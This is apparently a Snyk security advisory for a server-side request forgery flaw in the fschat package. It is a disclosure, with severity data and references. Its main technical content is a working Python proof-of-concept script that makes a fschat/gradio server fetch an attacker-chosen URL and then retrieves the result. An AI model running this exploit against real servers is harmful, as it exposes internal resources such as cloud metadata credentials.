Server-side Request Forgery (SSRF) Affecting fschat package, versions [0,]


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-FSCHAT-9553180
  • published28 Mar 2025
  • disclosed20 Mar 2025
  • creditoicu0619

Introduced: 20 Mar 2025

NewCVE-2024-12376  (opens in a new tab)
CWE-918  (opens in a new tab)

How to fix?

There is no fixed version for fschat.

Overview

fschat is an An open platform for training, serving, and evaluating large language model based chatbots.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to improper web server configuration. An attacker can access internal server resources and data that are otherwise inaccessible, such as AWS metadata credentials by sending crafted requests to the server.

PoC

import requests
import json
import sys
import hashlib
import time

if len(sys.argv) != 2:
        print("Usage: python poc.py <URL>")
        sys.exit(1)

ssrf_dst = sys.argv[1]        

url = "http://127.0.0.1:7860/queue/join?"
headers = {
    "Content-Type": "application/json"
}
data = {
    "data": [
        [
            {
                "meta": {"_type": "gradio.FileData"},
                "path": ssrf_dst
            }
        ]
    ],
    "event_data": None,
    "fn_index": 11,
    "trigger_id": 2,
    "session_hash": "l8v6ku4cm8d"
}
requests.post(url, headers=headers, data=json.dumps(data))

sha1 = hashlib.sha256()
sha1.update(ssrf_dst.encode('utf-8'))

time.sleep(2)
url = f"http://127.0.0.1:7860/file=/tmp/gradio/{sha1.hexdigest()}/{ssrf_dst.split('/')[-1]}"
response = requests.get(url) 
print(response.text)

References

CVSS Base Scores

version 4.0
version 3.1